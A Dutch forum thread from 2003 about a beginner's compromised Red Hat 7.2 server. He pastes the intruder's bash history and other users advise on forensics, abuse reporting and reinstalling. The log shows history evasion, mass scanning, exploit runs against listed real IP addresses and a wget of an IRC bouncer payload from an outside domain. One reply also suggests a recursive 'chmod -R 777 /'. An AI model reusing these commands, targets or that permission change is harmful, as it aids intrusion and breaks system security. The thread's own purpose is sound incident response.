[RH 7.2] Gehacked, wat nu? - Linux en overige clients

maandag 24 maart 2003 17:05

Acties:

Als je zoekt dan zul je vinden

Topicstarter

Ik ben toen net gehacked. het is dat ik net inlog en ik zie dat er een half uur geleden was ingelogt.

Ik gebruik Redhat 7.2 log in via ssh en putty.

Ik zou graag willen weten wat er is gebeurd omdat ik linux beginner ben.
ik heb de log en daar staat alles in wat er gedaan is.
Verder is de server nu alleen nog voor i-net deling en webserver dus niet echt iets bijzonders.

Dus ik zou graag willen weten:
Wat is er gebeurd (volgens mij zijn er poorten open gezet.)
Hoe ik dit kan voorkomen.
of ik een nieuwe installatie linux moet doen..

bvd.

edit. ik heb al op i-net gekeken wat dat psy is wat ze hebben uitgepakt alleen kan daar nog niet veel over vinden.

code:

unset HISFTILE
cd /dev/rd/cdb
cd .m2
./cnxver mass.log
ls
./cnxver mass.log
exit
cd /dev/rd/cdb
cd .m2
./op 0x09 196.44.35.67
./op 0x09 196.44.35.67 -c 21
[root@SERVER .m2]#
0x09 196.1.100.217
./op 0x09 196.1.100.217
./op  0x07 196.2.43.173
cvb
./op 0x13 196.7.54.37
./op  0x01 196.44.192.178
./op  0x01 196.44.192.178  -c 21
./op 0x07 196.44.193.34
./op 0x07 196.44.193.34 -c 21
cd /dev/rd/cdb
cd .m2
./cnxver mass.log
unset HISTFLE
cd /dev/rd/cdb
cd .m2
./cnxver mass.log
exit
unset HISFTILE
cd /dev/rd/cdb
cd .m2
./cnxscan --sockets 400 210.*.*.* --background
cat mass.pid
kill -9 1445
./cnxver mass.log
./cnxscan --sockets 400 210.*.*.* --background
exit
exit
cd /dev/rd/cdb
cd .m2
./cnxver mass.log
./op 0x01 210.11.58.29
./op 0x01 210.11.58.29 -c 21
cd /dev/rd/cdb
cd .m2
./cnxver mass.log
210.19.204.58wget oxigenatu.com/psy.tgz
210.19.204.58 wget oxigenatu.com/psy.tgz
wget oxigenatu.com/psy.tgz
tar zxvf psy.tgz
cd psybnc
./uptime
psybnc/src/p_log.c
cd src/p_log.c
cd p_log.c
cd p_log
ps ax
cd /dev/rd/cdb
cd .m2
./op 0x07 196.44.193.34 -c 21
ct
./op 0x07 210.19.204.58
./op 0x01 210.9.195.40
./op 0x01 210.9.195.40 -c 21
./op 0x09 210.9.134.102
./op 0x09 210.9.134.101
./op 0x01 210.20.148.97
./op 0x01 210.20.148.97 -c 21
./op 0x07 210.19.204.58
./op 0x07 210.19.204.58 -c 21
cd /var/tmp
wget oxigenatu.com/psy.tgz
tar zxvf psy.tgz
cd psybnc
./uptime
fistfile
histfile
./uptime
ps ax
./op 0x06 210.19.108.9
nbm
./op 0x06 210.19.108.9
./op 0x06 210.19.108.9
cd /dev/rd/cdb
cd .m2
./cnxver mass.log
cd /dev/rd/cdb
cd .m2
./op 0x11 210.0.142.141
./op 0x09 210.0.142.151
./op 0x09 210.0.143.138
./op 0x09 210.0.154.36
./op 0x09 210.0.154.36 -c 21
./uptime
cd psybnc
./uptime
cd
cd
./op 0x09 210.0.163.235
./op 
cd /var/tmp
wget oxigenatu.com/psy.tgz
tar zxvf psy.tgz
cd psybnc
./uptime
ging to log/psybnc.log
cd
cd
./op 0x07 210.0.200.89
./op 0x07 210.0.200.89
./op   0x07 210.0.200.89
./op   0x07 210.0.200.89
./op   0x07 210.0.200.89
cd /dev/rd/cdb
cd .m2
./op   0x07 210.0.200.89
./op 0x13 210.17.139.26
./op 0x07 210.17.135.205
./op 0x07 210.17.135.203
./op 0x07 210.17.135.202
./op   210.17.133.243
./op   210.17.133.243 -c 21
./op 0x06 210.17.133.243
./op 0x09 210.17.128.94
./op 0x07 210.16.36.253
unsethistfile
histfile
./op 0x07 210.16.20.10
tar zxvf psy.tgz
cd psybnc
./uptime
cd /dev/rd/cdb
cd ./m2
cd .m2
./cnxver mass.log
./uptime
./op 0x07 210.16.20.10 -c 21
cd /dev/rd/cdb
cd .m2
./op 0x07 210.16.20.10 -c 21
./uptime
tar zxvf psy.tgz
cd psybnc
./uptime
cd /dev/rd/cdb
cd .m2
./cnxver mass.log
cd psybnc
./uptime
cd
/cd /dev/rd/cdb
cd /dev/rd/cdb
cd .m2
./op 0x09 210.10.43.193
./op 0x09 210.10.43.193 -c 21
tar zxvf psy.tgz
cd psybnc
./uptime
cd /dev/rd/cdb
cd .m2
./cnxver mass.log
cd /dev/rd/cdb/
cd .m2
/cnxver mass.log
/cnxver mass.log
./cnxver mass.log
andrake 8.2 (apache-1.3.23-4)
210.23.230.169 : 0x06 - RedHat 7.1 (apache-1.3.19-5)
210.24.152.36 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.41 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.37 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.34 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.51 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.50 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.54 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.53 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.55 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.52 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.152.40 : 0x08 - RedHat 7.2 (apache 1.3.26-src)
210.24.244.155 : 0x05 - RedHat 7.0 (apache-1.3.12-25) (it could 6.2 too)
210.30.17.16 : 0x01 - Debian 3.0 (Woody) - apache-1.3.26-1
210.31.120.11 : 0x07 - RedHat 7.2 (apache-1.3.20-16)
210.32.131.2 : 0x05 - RedHat 7.0 (apache-1.3.12-25) (it could 6.2 too)
210.34.192.80 : 0x09 - RedHat 7.3 (apache-1.3.23-11)
210.35.2.5 : 0x09 - RedHat 7.3 (apache-1.3.23-11)
210.35.2.3 : 0x09 - RedHat 7.3 (apache-1.3.23-11;
cd /dev/rd/cdb/
cd .m2
./cnxscan --sockets 40 210.12.63.72
./cnxver mass.log
cd /dev/rd/cdb/
cd m2
cd .m2
./cnxver mass.log
./cnxver mass.log
cd /dev/rd/cdb/
cd .m2
.cnx mass.log
.cnxver  mass.log
.cnxver mass.log
./cnxver mass.log
./op 0x09 210.15.235.9
cd /dev/rd/cdb/
cd .m2
./op 0x11 210.23.9.66
./op 0x11 210.23.9.66 -c 21
./op 0x11 210.23.9.67
./op 0x13 210.23.9.103
./op 0x13 210.23.9.103 -c 21
cd /var/tmp
wget oxigenatu.com/psy.tgz
tar zxvf psy.tgz
cd psybnc
./uptime
./uptime
cd psybnc.log
cd /dev/rd/cdb/
cd .m2
./op 0x13 210.23.9.102
./op 0x13 210.23.9.102 -c 21
cd /var/tmp
wget oxigenatu.com/psy.tgz
tar zxvf psy.tgz
cd psybnc
./uptime
cd dev/rd/cdb/
cd dev/rd/cdb
cd /dev/rd/cdb
cd .m2
./cnxver mass.log
cd /deb/rd/cdb/
cd /deb/rd/cdb
cd /dev/rd/cdb
cd .m2
./op 0x06 210.23.230.169
./op 0x06 210.23.230.169 -c 21
wget oxigenatu.com/psy.tgz
tar zxvf psy.tgz
cd psybnc
./uptime
cd /dev/rd/cdb/
cd .m2
./op 0x09 210.23.146.211
./op 0x09 210.23.146.210
./op 0x09 210.23.146.212
./op  0x01 210.23.138.169
./op 0x01 210.23.136.24
./op 0x06 210.23.126.198

Hieronder had ik iets leuks kunnen neerzetten... Maar waarom mensen hiermee vervelen....

maandag 24 maart 2003 17:10

Acties:

odysseus

Debian GNU/Linux Sid

Hmm...die zit er duidelijk in

. Als ik jou was zou ik die machine helemaal leeggooien en er een nieuwe installatie op zetten. Zoek ook uit hoe hij binnen is gekomen en kijk of je in plaats van RH 7.2 geen 8.0 kunt installeren (al zijn er nog security updates voor 7.2, afaik). Het is ook handig om even zijn IP op te zoeken en daarmee naar zijn provider te stappen...als jij met duidelijke bewijzen aankomt dan willen die ook nog wel eens wat doen (verschilt wel sterk per provider). Het belangrijkste is echter om gewoon een nieuwe installatie te draaien. Je kunt het aan de hand van die logfile misschien weer dichtzetten, maar als je zoals je zelf zegt nog nieuw bent met Linux dan biedt dat niet genoeg zekerheid. Bovendien kunnen er wel andere dingen gebeurd zijn die je niet in je logbestand terugziet, dat kun je nooit zeker weten

Leven is het meervoud van lef | In order to make an apple pie from scratch, you must first create the universe.

maandag 24 maart 2003 17:11

Acties:

Solarsparc

Sja het advies wat je altijd zult krijgen... opnieuw installeren. Je kunt nooit nagaan wat er is gebeurd met het systeem, als je denkt dat je het hebt opgelost en er is iets blijven zitten dan ben je zo weer het haasje.
Poorten open laten staan is op zich helemaal geen drama, maar wel als daar programma's achter draaien die exploitable zijn. Was bijvoorbeeld je sshd wel up to date? Daar zijn namelijk onlangs een aantal exploits voor bekend gemaakt.
De beste remedie tegen hacken: zorg dat je systeem up to date is en draai geen services die niet nodig zijn!

maandag 24 maart 2003 17:14

Acties:

blaataaps

De cracker heeft psybnc geinstalleerd, een irc-lamer-programma. Hij heeft je bak waarschijnlijk gebruikt om te zoeken op open-proxies of vulnerabilities, in ieder geval 255^3 ip's gescand op iets: ./cnxscan --sockets 400 210.*.*.*
Je moet die bak zo snel mogelijk OFFline halen en herinstalleren, het feit dat ie 'alleen maar inet deelt en webservert' lijkt maar, dmv rootkits kan ie allemaal processen verstoppen voor jou. Je kunt dit voorkomen door een distro te installeren die meer uptodate is dan rh7.x.

[ Voor 3% gewijzigd door blaataaps op 24-03-2003 17:17 ]

maandag 24 maart 2003 17:19

Acties:

Looki

Als je zoekt dan zul je vinden

Topicstarter

Ik heb 8.0 al liggen.. alleen ik zit nog ff met een probleem dat ik moeilijk alles kan installeren.. van de server is de ps2 poort defect..

Alleen ik wil graag alle info die beschikbaar is bewaren.. omdat als hij een ander heeft gehacked via mijn bak.. ik moet kunnen bewijzen dat ik het niet was.. hoe kan ik dit doen? en welke log files zijn belangrijk?

Hieronder had ik iets leuks kunnen neerzetten... Maar waarom mensen hiermee vervelen....

maandag 24 maart 2003 17:23

Acties:

Verwijderd

dd if=/dev/hda of=/some/file/on/another/disk en vervolgens van zowel je /dev/hda als /some/file/on/another/disk een md5sum maken. Deze 2 sums vergelijken en dan weet je 100% zeker dat de data goed over is gezet. Je moet iig een complete image maken, omdat je niet weet wat er precies allemaal veranderd is. Zodra je dat hebt, reinstallen (hoe moeilijk dat ook mag zijn), patchen en verdergaan.

edit:

waar heb je bovenstaande informatie vandaan? Uit een history file?

[ Voor 10% gewijzigd door Verwijderd op 24-03-2003 17:25 ]

maandag 24 maart 2003 17:32

Acties:

Looki

Als je zoekt dan zul je vinden

Topicstarter

Verwijderd schreef op 24 maart 2003 @ 17:23:
dd if=/dev/hda of=/some/file/on/another/disk en vervolgens van zowel je /dev/hda als /some/file/on/another/disk een md5sum maken. Deze 2 sums vergelijken en dan weet je 100% zeker dat de data goed over is gezet. Je moet iig een complete image maken, omdat je niet weet wat er precies allemaal veranderd is. Zodra je dat hebt, reinstallen (hoe moeilijk dat ook mag zijn), patchen en verdergaan.

edit:
waar heb je bovenstaande informatie vandaan? Uit een history file?

Het probleem is niet het reinstallen.. dit kan wel via een USB tobo maar van md5sum heb ik nog nooit gehoord.. maar dit zoek ik wel ff uit..
ouders wel een avond zonder i-net

Edit .. die staat in de root/.bash-history

[ Voor 3% gewijzigd door Looki op 24-03-2003 17:33 ]

Hieronder had ik iets leuks kunnen neerzetten... Maar waarom mensen hiermee vervelen....

maandag 24 maart 2003 17:45

Acties:

Looki

Als je zoekt dan zul je vinden

Topicstarter

hoe kan je het hele systeem chmod-den naar 777? dan kan ik via samba wel een hele ing van de schijf maken.. (toch?) alleen hoe ziet het met de alleen extentie files? .test ofzo.. dit pikt windows toch niet?

Hier heb ik de actieve processen.. staat hier iets ongewoons tussen?

code:

login as: root
Sent username "root"
root@192.168.0.1's password:
Last login: Mon Mar 24 16:13:40 2003 from 192.168.0.2
[root@SERVER root]# ps -A
  PID TTY          TIME CMD
    1 ?        00:00:06 init
    2 ?        00:00:00 keventd
    3 ?        00:00:00 kapm-idled
    4 ?        00:00:00 ksoftirqd_CPU0
    5 ?        00:00:14 kswapd
    6 ?        00:00:00 kreclaimd
    7 ?        00:00:00 bdflush
    8 ?        00:00:01 kupdated
    9 ?        00:00:00 mdrecoveryd
   13 ?        00:00:15 kjournald
  515 ?        00:00:00 eth0
  703 ?        00:00:00 syslogd
  708 ?        00:00:00 klogd
  729 ?        00:00:00 portmap
  757 ?        00:00:00 rpc.statd
  869 ?        00:00:00 apmd
  925 ?        00:00:25 sshd
  958 ?        00:00:00 xinetd
 1052 ?        00:00:01 smbd
 1057 ?        00:00:02 nmbd
 1085 ?        00:00:15 httpd
 1104 ?        00:00:00 sendmail
 1123 ?        00:00:01 gpm
 1141 ?        00:00:00 crond
 1148 ?        00:00:00 safe_mysqld
 1175 ?        00:00:33 mysqld
 1333 ?        00:00:01 miniserv.pl
 1337 tty1     00:00:00 mingetty
 1338 tty2     00:00:00 mingetty
 1339 tty3     00:00:00 mingetty
 1340 tty4     00:00:00 mingetty
 1341 tty5     00:00:00 mingetty
 1342 tty6     00:00:00 mingetty
 1346 ?        00:00:00 mysqld
 1347 ?        00:00:00 mysqld
14467 ?        00:00:00 httpd
14468 ?        00:00:00 httpd
14469 ?        00:00:00 httpd
15603 ?        00:00:25 smbd
15684 ?        00:00:00 sshd
15685 pts/0    00:00:00 bash
15731 pts/0    00:00:00 ps

[ Voor 80% gewijzigd door Looki op 24-03-2003 17:48 ]

Hieronder had ik iets leuks kunnen neerzetten... Maar waarom mensen hiermee vervelen....

maandag 24 maart 2003 17:46

Acties:

jep

Als je dat echt wilt:

chmod -R 777 /

Dan krijg je wel een hoop errors van sockets, /proc zaken, etcetera.. maar je bent wel helemaal 777

Looki schreef op 24 March 2003 @ 17:45:
alleen hoe ziet het met de alleen extentie files? .test ofzo.. dit pikt windows toch niet?

Da's geen punt als je ze gewoon in windows op gaat slaan. Als je ze wilt openen kun je ze ook openen met een error die 't formaat aan kan. In 't ergste geval wijzig je de extentie even

[ Voor 57% gewijzigd door jep op 24-03-2003 17:48 ]

maandag 24 maart 2003 17:52

Acties:

Verwijderd

md5sum maakt een md5 checksum van een file. Omdat md5 een behoorlijk lange hash genereerd, is het nagenoeg onmogelijk om een bestand te wijzigen zonder daarbij ook de md5sum te wijzigen. Dit is een (legale voor zover ik weet, maar IANAL !! ) manier waarop je je disk mee kunt nemen naar een rechtzaal.

edit:

Als je systeem gehacked is, is er _niets_ meer op die box wat je kunt vertrouwen, dus ook niet een process listing.

offtopic:
wel een echte lame l33t kiddie hoor, dat ie geeneens de ~/.history leeg heeft gemaakt

[ Voor 14% gewijzigd door Verwijderd op 24-03-2003 17:53 ]

maandag 24 maart 2003 17:54

Acties:

Solarsparc

Overigens komt die psy.tgz van een domein wat geen page heeft - maw het ziet er naar uit dat het een persoonlijk domein is waar iemand wat persoonlijke files op host, en de eigenaar zou dus alleen weten dat die file daar staat. Met een whois client krijg je dan heel wat gegevens (mits die naar waarheid zijn ingevuld).
Dit blijft uiteraard speculeren, maar als iemand zo dom is om z'n bash-history te laten staan is ie misschien ook wel zo dom om z'n eigen domein te gebruiken

maandag 24 maart 2003 17:57

Acties:

sebas

Waarom wil je alles 777 chmodden?

Als je met dd een image ervan maakt neem je mooi alles mee, ook de .test files, permissions, whatever. Daarnaast kunnen permissions nog wel handig zijn om te houden, omdat je anders later niet kunt checken welke permissions eventueel veranderd zijn, dat kan nog wel eens helpen te achterhalen wat er nou daadwerkelijk gebeurd is, en hoe het te voorkomen.

Probeer er zo veel mogelijk van te leren, misschien kun je het op die manier een tweede keer vermijden.

Everyone complains of his memory, no one of his judgement.

maandag 24 maart 2003 21:16

Acties:

Guru Evi

Neem al je log files en zet die op je eigen pc (al kunnen die met gemak gewijzigd zijn - een beetje slimme hacker doet dat). Knip elke vermelding van zijn IP-adress in je logs en het blok dat je vermoed dat zijn/haar handelingen geweest zijn.
Ga dan naar www.ripe.net en vraag op van wie die IP-adressen zijn. Dan zie je zijn/haar provider staan. Mail dan naar de Internet Abuse van die provider (meestal abuse@provider.net) of als hij zijn eigen domain compleet host, naar de top-level domain provider of zijn/haar agent.

STUUR ALLES OP IN DE BODY VAN HET E-MAIL (niet als attachment) MET DUIDELIJKE AANDUIDINGEN WAT ER GEBEURD IS EN WELKE LOG FILE HET VAN KOMT. (anders komen ze in de problemen en duurt de behandeling langer of gaan ze ze nog nooit de behandeling doen, be sure, ik werk op de helpdesk van een provider en moet soms ook zo'n dingen behandelen of kwade gebruikers zeggen dat ze eigenlijk geen goeie log files opgestuurd hebben - bewaar alle logs (of misschien zelfs de originele harddisk of een image ervan) totdat de provider zegt dat het afgehandeld is of totdat je rechtszaak afgelopen is (in geval van eigen domain hosting ga je zo moeten werken))

Tjah, nu je linux herinstalleren (doe een goeie format en herpartitioneer, dan ben je zeker dat er geen files per ongeluk blijven staan) je redhat updaten (op tijd desnoods met rhn) en poorten sluiten, de standaard policy van alle chains moet op DROP staan (en ook geen tooltjes gebruiken om je ipchains of iptables te maken) en enkel toelaten wat je echt nodig hebt op afstand. Ik zie dat je MySQL draait, maar hoogstwaarschijnlijk heb je die niet nodig of toch niet op afstand dus afsluiten die boel.

[ Voor 3% gewijzigd door Guru Evi op 24-03-2003 21:17 ]

Pandora FMS - Open Source Monitoring - pandorafms.org

maandag 24 maart 2003 22:21

Acties:

Verwijderd

- zijn ip zoeken en de netblock-owner opzoeken met whois. mailtje sturen bla die bla.
- reinstall van je system.
- vervolgens moet jij eens gaan lezen: http://www.linuxsecurity....ecurity-Quickstart-HOWTO/

/edit: Uit de FAQ zelfs een entry:

http://www.linuxsecurity....TO/intrusion.html#RECLAIM

[ Voor 35% gewijzigd door Verwijderd op 25-03-2003 07:28 ]

maandag 24 maart 2003 23:51

Acties:

pinball

Electric Monk

Verwijderd schreef op 24 maart 2003 @ 22:21:
/edit: Uit de FAQ zelfs een entry speciaal voor jou:

http://www.linuxsecurity....TO/intrusion.html#RECLAIM

ik vind deze persoonlijk beter (als je het echt grondig wilt aanpakken iig):
http://www.cert.org/tech_tips/root_compromise.html

Whenever you find that you are on the side of the majority, it is time to reform.

dinsdag 25 maart 2003 00:27

Acties:

sebas

Zijn hier trouwens ook mensen die dit al hebben meegemaakt, misschien iemand gepakt? Ik ben wel benieuwd hoeveel aandacht eraan besteed wordt als je een provider mailt dat iemand bij jou zat te fscken. Ik kan me voorstellen dat dit gezien het aantal scriptkiddies redelijk veel werk oplevert, voor alle betrokkenen.

Everyone complains of his memory, no one of his judgement.

dinsdag 25 maart 2003 00:33

Acties:

Wilke

Als je alles wilt bewaren kun je beter 'tar' gebruiken en dan de grote file die daar uitkomt met Samba kopieeren.

Daarna is het devies: opnieuw installeren die hap. En dus niet halfbakken: partities verwijderen, opnieuw maken, en alles opnieuw van CD installeren. Dit alles nadat je evt. hebt gekeken of er nog iets te achterhalen valt over de dader. Het is een behoorlijk lame scriptkiddie als je zo enorm duidelijk kunt zien dat 'ie binnen is geweest (zelfs de logintijd niet verborgen....tssssk...stond er nog bij vanaf welk IP voor het gemak?)

dinsdag 25 maart 2003 00:39

Acties:

MikeN

sebas schreef op 25 March 2003 @ 00:27:
Zijn hier trouwens ook mensen die dit al hebben meegemaakt, misschien iemand gepakt? Ik ben wel benieuwd hoeveel aandacht eraan besteed wordt als je een provider mailt dat iemand bij jou zat te fscken. Ik kan me voorstellen dat dit gezien het aantal scriptkiddies redelijk veel werk oplevert, voor alle betrokkenen.

Ik heb ooit wel is een mailtje gestuurd omdat ik gek werd van iemand die als anonymous probeerde in te loggen op m'n ftp server. Na een dag of wat kreeg ik een mailtje terug dat z'n account terminated was

dinsdag 25 maart 2003 00:49

Acties:

GA!S

295 g/km

Verwijderd schreef op 24 maart 2003 @ 22:21:

(en over het algemeen je iets meer gaan verdiepen in security voordat je een bakje aan het internet hangt)

offtopic:
Ik heb bij dat soort opmerkingen altijd een beetje een dubbel gevoel. Aan de ene kant moet je natuurlijk geen lekke zeef aan het web hangen, maar aan de andere kant slaat het nergens op dat iemand compleet security expert moet zijn voordat hij een eigen servertje (voor persoonlijke doeleinden) aan het web "mag" hangen.
Op het moment dat een "hacker" meer moeite moet doen dan bijvoorbeeld een root password raden in telnet of via een Samba share je hele drive kan uitlezen, dan vind ik het niet nodig om die gebruiker naar zijn hoofd te slingeren dat het zijn eigen schuld is.

Begrijp me niet verkeerd, geen directe reactie op Tribunal zijn post, maar ik zie vrij vaak dat soort reacties zodra het over persoonlijke *nix servers gaat.

[ Voor 11% gewijzigd door GA!S op 25-03-2003 00:51 ]

de betaler vervuilt

dinsdag 25 maart 2003 01:23

Acties:

pinball

Electric Monk

GA!S schreef op 25 maart 2003 @ 00:49:

offtopic:
<..>

offtopic:
je hebt wel gelijk in de zin dat het jammer is dat je niet meer 'zomaar' een servertje aan inet kan hangen, net zomin als het tegenwoordig voldoende is om je deur (of auto) 'normaal' op slot te doen. Alleen is het zo dat als er iemand in jouw huis inbreekt, ik daar geen last van heb. Als iemand jouw pc kraakt en vervolgens daarvandaan mij gaat hacken/ddossen/spammen heb ik daar wel last van.
Een pc/server aan inet hangen brengt verantwoordlijkheid met zich mee, en dat mag best gezegd worden. (zolang het op een normale manier gezegd wordt, met links naar helppagina's, en zonder iemand meteen verrot te schelden omdattie een obscure exploit over het hoofd heeft gezien)

Whenever you find that you are on the side of the majority, it is time to reform.

dinsdag 25 maart 2003 01:32

Acties:

Verwijderd

offtopic:
Het is een beetje Of - Of. Of je investeerd er geen tijd in en je box word gecracked, of je verdiept je in de materie en je box word niet meer gecracked(tm). Voor mij is die keuze best duidelijk

Ok, en nu weer ontopic.

Looki, hoever ben je met de recovery van je box? Nog interesante dingen tegengekomen?

dinsdag 25 maart 2003 01:40

Acties:

Verwijderd

offtopic:
Ik vind dat deze user totaal niet naar zijn hoofd geslingerd hoeft te krijgen dat hij meer over security moet weten.
zoals hij in zijn post al aangeft, hij zag meteen dat er een ahcker aanwezig was geweest.

je kunt je bak nog zo goed beschermen, ergenst is wel iemand die er in kan komen.
de truuk is om dat dan ook snel door te hebben.

(ik vind dit trouwens vooral omdat ik bijna niet eens omkijk naar waneer ik ingelogd ben of voor het laats ingelogd was. maja mijn bak hangt ook niet direct aan het internet dat scheelt zo'n beetje de halve wereld.)

meschien een leuk topic, security do's and don'ts handige cron scripts, tips etc.
natuurlijk niet de standaart meuk want dat hoort iedereen gewoon te weten na verloop van tijd. maar meer de ingineuze kleine scriptjes en tipjes die het net even makkelijker maken.
(das weer eens wat anders dan [x]y doet het niet. toch?

dinsdag 25 maart 2003 02:09

Acties:

interp

Mail ook naar je eigen provider en vraag of je de flow-log krijgt van jou ip en vermeld ook het uur & de reden. Vermits hij zo stom is om de .bash_history te laten staan.. wie weet heeft hij het vanop zijn eigen ip gedaan, als je de logs (of alle ips krijgt) van het pakweg een uur kun je systematisch alle ips uitschakelen en dan blijf je met zijn ip over of met het ip vanwaar het gedaan is (van een andere gehackte server), je zoekt op van wie dat ip dan weer is en stuurt daar mailtje naar...
Track the bitch down

dinsdag 25 maart 2003 10:02

Acties:

Jaap-Jan

Je kunt er de volgende keer voor zorgen dat men geen toegang kan krijgen van het internet door dit in /etc/ssh/sshd_config te zetten:

code:

1	ListenAddress <ip-adres>

waarbij <ip-adres> het IP-adres is van je NIC die aan het LAN hangt. Hierdoor kan er niet meer ingelogd worden vanaf het internet.

| Last.fm | "Mr Bent liked counting. You could trust numbers, except perhaps for pi, but he was working on that in his spare time and it was bound to give in sooner or later." -Terry Pratchett

dinsdag 25 maart 2003 19:32

Acties:

Looki

Als je zoekt dan zul je vinden

Topicstarter

Verwijderd schreef op 25 March 2003 @ 01:32:

offtopic:
Het is een beetje Of - Of. Of je investeerd er geen tijd in en je box word gecracked, of je verdiept je in de materie en je box word niet meer gecracked(tm). Voor mij is die keuze best duidelijk

Ok, en nu weer ontopic. Looki, hoever ben je met de recovery van je box? Nog interesante dingen tegengekomen?

Ik ben heel blij..

Ik heb voor de zekerheid de hele server maar vervangen.. ik had nog een AMD K6-2 375MHz staan.. dus die heb ik even ingericht.. ik heb al wat meer aan security gedaan.. zo heb ik alle poorten nu zo'n beetje dicht gegooit voor buitenaf.. ik kan alleen nog de https niet dichtzetten..

Ik ben nu overgegaan op RH8.0 (iets beter weer dan een bugvolle 7.2

) en heb nu ook de ipchains wat beter dicht gegooit..

over de hele offtopic verhalen..
Ik ben een nieuwe linux gebruiker en wist vorig jaar nog NIETS van linux.. ik heb mij er nu al wat meer in verdiept, maar tot vorige week wist ik niet dat je zo in linux komt als je je bak niet update.. omdat bij windows de updates autom. gaan was dit voor mij even nieuw.
over dat je linux niet aan het i-net moet hangen als het niet goed beveiligd is, wil ik zeggen dat dit niet erg is.. je moet alleen de eerste tijd opletten dat je op de achterhangende pc's wel de beveiliging goed dicht hebt en geen info op de server hebt staan die niet door buitenstaanders gelezen mogen worden.

Na een aantal tutorials heb ik alles al wat beter dicht zitten. alleen moet ik nu de IPTABLES weer aanzetten.. ik heb hier even alles uitgezet, omdat ik gister het i-net niet aan de gang kreeg. het was namelijk het probleem dat de ip_forward_..... niet op 1 stond.. duurt ook 3 uur om daar achter te komen als je niet veel van linux weet

..

Nog een voordeel van een herinstall.. ik heb nu weer een goede ping.. dit was de laarste weken er fluctuërend (weer een mooi woord geleerd

).. dus ik ben weer erg blij..

Nu zit ik alleen nog met het updaten wat nog niet voorspoedig loopt.. ik heb geen GIU als kde / gnome dus updaten gaat moeilijker.. met up2date slaat mijn hoofd nog op hol namelijk

Japie_17 schreef op 25 March 2003 @ 10:02:
Je kunt er de volgende keer voor zorgen dat men geen toegang kan krijgen van het internet door dit in /etc/ssh/sshd_config te zetten:
code:
1
 ListenAddress <ip-adres>
waarbij <ip-adres> het IP-adres is van je NIC die aan het LAN hangt. Hierdoor kan er niet meer ingelogd worden vanaf het internet.

Dit heb ik in de ipchains al geregeld.. alleen daar kan ik meerder ip's openstellen.. van mijn werk enzo

[ Voor 11% gewijzigd door Looki op 25-03-2003 19:35 ]

Hieronder had ik iets leuks kunnen neerzetten... Maar waarom mensen hiermee vervelen....

dinsdag 25 maart 2003 21:44

Acties:

Looki

Als je zoekt dan zul je vinden

Topicstarter

Ik heb nu nog een probleem erbij gekregen.. alles is weer op orde.. de webserver map in geshared over het interne net.. alleen als ik hier via win xp hier iets heen kopieer.. dan start de computer opnieuw op.. ik kan wel een word document erin opslaan, maar niet de hele web backup terug plaatsen.. dit heb ik nog nooit gehad.. iemand een idee hoe dit komt?

Hieronder had ik iets leuks kunnen neerzetten... Maar waarom mensen hiermee vervelen....

dinsdag 25 maart 2003 22:20

Acties:

Verwijderd

ehm, ik dacht dat dat niet ging, ipchains en iptables samen?
eneuhm, up2date --nox -u werkt steeds perfect bij mij, tenzij server overbezet is(studentenaccount redhat network)

woensdag 26 maart 2003 12:59

Acties:

Verwijderd

2 jaar terug was ik wel een keer gehacked. Had een verouderde BIND service draaien (ook nog nutteloos voor thuis) Ik merkte het pas toen m'n CPU usage opeeens naar 100% vloog en m'n upload ook (cnyscan?), haalde direct de UTP kabel er uit. ontdekte al snel dat de programma's in de /bin directory niet meer klopte. en dat er allemaal vreemde hidden maps waren aangemaakt (daar draaide de scan vanaf) Ik ben er een week of 2 mee bezig geweest, had uiteindelijk HD geformatteerd en RH er op geinstalleerd omdat die goede up2date service had dacht ik... Draai nog om de zoveel tijd chkrootkit. Dat is volgens mij de enige manier om te kijken of je niet gehacked bent. naast natuurlijk goede beveiliging en opletten op vreemde dingen.

woensdag 26 maart 2003 16:38

Acties:

Jaap-Jan

Verwijderd schreef op 26 March 2003 @ 12:59:
2 jaar terug was ik wel een keer gehacked. Had een verouderde BIND service draaien (ook nog nutteloos voor thuis)

Voor enkel het resolven van DNS requests voor het LAN is het programma dnsmasq net iets handiger. Deze kan ook lokale gebruikers resolven door entries uit de dhcpd.leases te halen en is veel veiliger in gebruik als je geen DNS- server hoeft te draaien voor het internet.

| Last.fm | "Mr Bent liked counting. You could trust numbers, except perhaps for pi, but he was working on that in his spare time and it was bound to give in sooner or later." -Terry Pratchett

woensdag 26 maart 2003 18:14

Acties:

Robtimus

me Robtimus no like you

Looki schreef op 25 maart 2003 @ 19:32:
over dat je linux niet aan het i-net moet hangen als het niet goed beveiligd is, wil ik zeggen dat dit niet erg is.. je moet alleen de eerste tijd opletten dat je op de achterhangende pc's wel de beveiliging goed dicht hebt en geen info op de server hebt staan die niet door buitenstaanders gelezen mogen worden.

Het is WEL erg. Jijzelf hebt er misschien direct geen last van, maar die PC kan wel gebruikt worden om andere aanvallen uit te voeren. En raad eens wie ze als eerste gaan ondervragen als jouw PC hiervoor wordt gebruikt?

Nu zit ik alleen nog met het updaten wat nog niet voorspoedig loopt.. ik heb geen GIU als kde / gnome dus updaten gaat moeilijker.. met up2date slaat mijn hoofd nog op hol namelijk ..

Installeer anders eens X met een andere windowmanager, bv blackbox of fluxbox; blackbox draait vrij snel op mijn P233 32MB laptop (ik neem aan dat snelheid de reden was dat je geen KDE/Gnome hebt)

More than meets the eye
There is no I in TEAM... but there is ME
system specs

woensdag 26 maart 2003 19:23

Acties:

Looki

Als je zoekt dan zul je vinden

Topicstarter

IceManX schreef op 26 March 2003 @ 18:14:
Installeer anders eens X met een andere windowmanager, bv blackbox of fluxbox; blackbox draait vrij snel op mijn P233 32MB laptop (ik neem aan dat snelheid de reden was dat je geen KDE/Gnome hebt)

